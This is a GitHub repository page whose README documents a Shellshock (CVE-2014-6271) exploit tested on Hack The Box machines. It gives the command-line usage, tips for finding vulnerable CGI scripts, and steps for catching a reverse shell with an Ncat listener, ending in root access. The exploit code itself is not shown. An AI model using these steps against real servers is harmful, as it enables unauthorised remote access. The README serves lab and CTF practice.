-
Notifications
You must be signed in to change notification settings - Fork 0
mohan2020coder/cmd_shell_shock
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
# CVE-2014-6271 - go run shellshock_exploit.go -LHOST=<LHOST> -LPORT=<LPORT> -TARGET_URL=<TARGET_URL> Shellshock exploit aka CVE-2014-6271. <br> Tested on Bash 3.2 and Bash 4.2. <br> For more information about the vulnerability visit : https://nvd.nist.gov/vuln/detail/CVE-2014-6271 ## Note --- The exploit was mainly tested on **Hack The Box** in the following boxes: - `Beep` box : https://app.hackthebox.eu/machines/Beep - `Shocker` box : https://app.hackthebox.eu/machines/Shocker <br> This exploit will only work on web servers having a version of Bash < 4.3.<br> In some cases, if you are able to get a HTTP 200 code on your web browser<br> by doing a GET request to the `/cgi-bin/`, you could just try to run the exploit against that directory.<br><br> Otherwise if you have a 403 on the `/cgi-bin/` directory, try to enumerates for files<br> within that directory with a good wordlist, searching for `.sh` or `.cgi` extensions.<br> **NOTE: Don't forget to setup your TCP listenner, otherwise the exploit might give you** **a false positive during the testRevShell call check**<br><br> ## Proof of Concept (POC) --- First of all we can see the arguments that the exploit is taking by running: `shellshock.py -h`<br><br>  <br><br> Then we can set up a Ncat listenner on a port of our choice, here I chose 45<br><br>  <br><br> Next we can run the exploit by supplying all the arguments that it takes by running:<br> `shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]`<br> The target URL here as you can see is where the web server sends a POST request during authentication on that box <br><br> Here as we can see in the output, the exploit tried sending the payload over SSL using multiple TLS versions, until it succeed <br><br>  <br><br> And here we got our reverse shell! Lucky enough, the web server was running as root. <br><br>  <br> https://github.com/b4keSn4ke/CVE-2014-6271/
About
No description, website, or topics provided.
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published